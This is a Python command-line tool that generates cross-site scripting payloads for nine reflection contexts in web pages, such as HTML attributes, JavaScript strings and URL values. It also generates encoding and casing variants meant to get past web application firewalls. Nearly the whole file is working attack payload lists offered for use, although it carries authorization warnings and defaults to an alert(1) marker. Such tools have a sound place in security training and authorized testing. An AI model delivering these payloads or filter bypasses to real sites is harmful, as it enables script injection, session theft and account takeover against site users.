#!/usr/bin/env python3
"""
xss_payload_generator.py — Context-aware XSS payload generator.

Given the *context* in which user input is reflected (HTML body, attribute,
JS string, URL, etc.) and an optional set of filtered characters, generates
candidate XSS payloads suited to that context. Educational tool — does NOT
make HTTP requests, does NOT scan, does NOT exploit. It only emits payloads
for you to test manually in your own labs (DVWA, Juice Shop, PortSwigger
Web Security Academy) or in authorized engagements.

Output is plain (one payload per line) or JSON.

⚠️ AUTHORIZATION REQUIRED for any live use ⚠️
The payloads generated by this tool, if delivered to a target you don't own,
constitute unauthorized access. Use this tool to learn about contexts and
sanitization bypasses; deploy payloads only against systems you own or are
explicitly authorized to test.

Usage:
    python3 xss_payload_generator.py --context html_body
    python3 xss_payload_generator.py --context html_attr_double
    python3 xss_payload_generator.py --context js_string --marker MYTAG
    python3 xss_payload_generator.py --context html_body --filter "<,>,script"
    python3 xss_payload_generator.py --list-contexts
"""
from __future__ import annotations

import argparse
import json
import sys
from dataclasses import dataclass, field

DEFAULT_MARKER = "alert(1)"


@dataclass
class PayloadSet:
    context: str
    description: str
    payloads: list[str] = field(default_factory=list)


def html_body_payloads(marker: str) -> list[str]:
    return [
        f"<script>{marker}</script>",
        f"<img src=x onerror={marker}>",
        f"<svg onload={marker}>",
        f"<svg/onload={marker}>",
        f"<body onload={marker}>",
        f"<details open ontoggle={marker}>",
        f"<input autofocus onfocus={marker}>",
        f"<select autofocus onfocus={marker}>",
        f"<iframe srcdoc='<script>{marker}</script>'>",
        f"<a href='javascript:{marker}'>x</a>",
        f"<math><mtext><option><FAKEFAKE></option></mtext></math><script>{marker}</script>",
        f"<x onclick={marker}>x",
        f"<svg><script>123<1>{marker}</script>",  # parser confusion
        f"<noscript><p title=\"</noscript><img src=x onerror={marker}>\">",
    ]


def html_attr_double_payloads(marker: str) -> list[str]:
    """Reflection inside double-quoted attribute: <input value="USER">"""
    return [
        f'" autofocus onfocus={marker} x="',
        f'"><script>{marker}</script>',
        f'"><img src=x onerror={marker}>',
        f'" onmouseover={marker} x="',
        f'" onclick={marker} //',
        f'"><svg onload={marker}>',
        f'\\" onload={marker} \\"',
    ]


def html_attr_single_payloads(marker: str) -> list[str]:
    return [
        f"' autofocus onfocus={marker} x='",
        f"'><script>{marker}</script>",
        f"'><img src=x onerror={marker}>",
        f"' onmouseover={marker} x='",
    ]


def html_attr_unquoted_payloads(marker: str) -> list[str]:
    """Reflection inside an unquoted attribute: <input value=USER>"""
    return [
        f" autofocus onfocus={marker}",
        f" onmouseover={marker}",
        f"/onclick={marker}//",
        f" onfocus={marker} autofocus tabindex=1 ",
    ]


def js_string_payloads(marker: str) -> list[str]:
    """Reflection inside JS string: var x = 'USER' or var y = "USER" """
    return [
        f"';{marker};//",
        f"\";{marker};//",
        f"</script><script>{marker}</script>",
        f"\\';{marker};//",
        f"`;${{{marker}}};`",  # template literal escape
        f"';{marker};var x='",
    ]


def js_template_payloads(marker: str) -> list[str]:
    """Reflection inside template literal: `Hello, ${USER}!`"""
    return [
        f"${{ {marker} }}",
        f"${{ ({marker}) }}",
        f"${{ alert`1` }}",
    ]


def url_value_payloads(marker: str) -> list[str]:
    """Reflection in href/src/etc."""
    return [
        f"javascript:{marker}",
        f"javascript:{marker}//",
        f"j&#x61;vascript:{marker}",  # HTML entity
        f"javascript&#x3a;{marker}",
        f"data:text/html,<script>{marker}</script>",
        f"vbscript:{marker}",  # IE legacy
    ]


def html_comment_payloads(marker: str) -> list[str]:
    """Reflection inside <!-- USER -->"""
    return [
        f"--><script>{marker}</script><!--",
        f"--><img src=x onerror={marker}><!--",
    ]


def style_value_payloads(marker: str) -> list[str]:
    """Reflection inside <style> or style attribute (older browsers, niche)"""
    return [
        f"</style><script>{marker}</script>",
        f"\"></style><script>{marker}</script>",
        f"expression({marker})",  # IE legacy
    ]


def filter_payloads(payloads: list[str], filtered: list[str]) -> list[str]:
    if not filtered:
        return payloads
    out: list[str] = []
    filtered_lower = [f.lower() for f in filtered]
    for p in payloads:
        plow = p.lower()
        if any(f in plow for f in filtered_lower):
            continue
        out.append(p)
    return out


def waf_bypass_variants(payload: str) -> list[str]:
    """Generate a few generic encoding/casing variants of a payload."""
    variants = []
    # Mixed case
    mixed = "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(payload))
    variants.append(mixed)
    # HTML-entity encoding of <
    variants.append(payload.replace("<", "&lt;").replace(">", "&gt;"))
    # Hex-entity encoding of key chars
    variants.append(payload.replace("<", "&#x3c;").replace(">", "&#x3e;"))
    # URL-encoded
    enc_map = {"<": "%3C", ">": "%3E", '"': "%22", "'": "%27", " ": "%20"}
    enc = "".join(enc_map.get(c, c) for c in payload)
    variants.append(enc)
    # Double URL-encoded
    enc2 = "".join(("%25" + format(ord(c), "02X")) if c in '<>"\' ' else c for c in payload)
    variants.append(enc2)
    return variants


CONTEXTS: dict[str, tuple[str, callable]] = {
    "html_body": ("Reflection in HTML body (between tags)", html_body_payloads),
    "html_attr_double": ("Reflection inside double-quoted HTML attribute", html_attr_double_payloads),
    "html_attr_single": ("Reflection inside single-quoted HTML attribute", html_attr_single_payloads),
    "html_attr_unquoted": ("Reflection inside unquoted HTML attribute", html_attr_unquoted_payloads),
    "html_comment": ("Reflection inside an HTML comment <!-- USER -->", html_comment_payloads),
    "js_string": ("Reflection inside JavaScript string literal", js_string_payloads),
    "js_template": ("Reflection inside JavaScript template literal `${USER}`", js_template_payloads),
    "url_value": ("Reflection inside URL value (href, src, ...)", url_value_payloads),
    "style_value": ("Reflection inside CSS style or <style>", style_value_payloads),
}


def main() -> int:
    p = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)
    p.add_argument("--context", help=f"Reflection context. One of: {', '.join(CONTEXTS)}")
    p.add_argument("--marker", default=DEFAULT_MARKER, help=f"JS expression to use as marker (default: {DEFAULT_MARKER!r})")
    p.add_argument("--filter", default="", help="Comma-separated substrings the target filters (e.g. '<,script,onerror')")
    p.add_argument("--variants", action="store_true", help="Also emit WAF-bypass encoding variants")
    p.add_argument("--list-contexts", action="store_true", help="List supported contexts and exit")
    p.add_argument("--all", action="store_true", help="Emit payloads for every context")
    p.add_argument("--json", action="store_true", help="Emit JSON")
    p.add_argument("-o", "--output", help="Write to file")
    args = p.parse_args()

    if args.list_contexts:
        for k, (desc, _) in CONTEXTS.items():
            print(f"  {k:25s}  {desc}")
        return 0

    if not args.context and not args.all:
        p.error("Either --context or --all is required (or use --list-contexts).")

    contexts_to_emit = list(CONTEXTS) if args.all else [args.context]
    for c in contexts_to_emit:
        if c not in CONTEXTS:
            print(f"[-] Unknown context: {c}. Use --list-contexts.", file=sys.stderr)
            return 2

    filtered = [s.strip() for s in args.filter.split(",") if s.strip()]

    sets: list[PayloadSet] = []
    for c in contexts_to_emit:
        desc, fn = CONTEXTS[c]
        payloads = fn(args.marker)
        if filtered:
            payloads = filter_payloads(payloads, filtered)
        if args.variants:
            extra = []
            for pl in payloads:
                extra.extend(waf_bypass_variants(pl))
            payloads = payloads + extra
            # Dedupe preserving order
            seen: set[str] = set()
            payloads = [x for x in payloads if not (x in seen or seen.add(x))]
        sets.append(PayloadSet(context=c, description=desc, payloads=payloads))

    if args.json or args.output:
        out = json.dumps(
            [{"context": s.context, "description": s.description, "payloads": s.payloads} for s in sets],
            indent=2,
        )
        if args.output:
            with open(args.output, "w", encoding="utf-8") as f:
                f.write(out)
            print(f"[+] Wrote {args.output}", file=sys.stderr)
        else:
            print(out)
    else:
        for s in sets:
            print(f"\n# Context: {s.context}")
            print(f"# {s.description}\n")
            for pl in s.payloads:
                print(pl)

    print(
        "\n[i] These payloads are educational. Test only against systems you "
        "own or are authorized to assess.",
        file=sys.stderr,
    )
    return 0


if __name__ == "__main__":
    sys.exit(main())
